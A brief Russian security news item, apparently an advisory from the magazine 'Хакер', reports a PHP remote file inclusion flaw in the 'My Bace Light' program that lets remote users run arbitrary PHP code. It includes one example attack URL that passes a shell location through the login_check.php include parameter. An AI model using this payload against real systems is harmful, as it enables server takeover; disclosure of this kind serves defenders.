PHP-инклюдинг в My Bace Light

Программа: My Bace Light

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.

Пример:

http://[target]/includes/login_check.php?hauptverzeichniss=[shell]

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.
Похожие материалы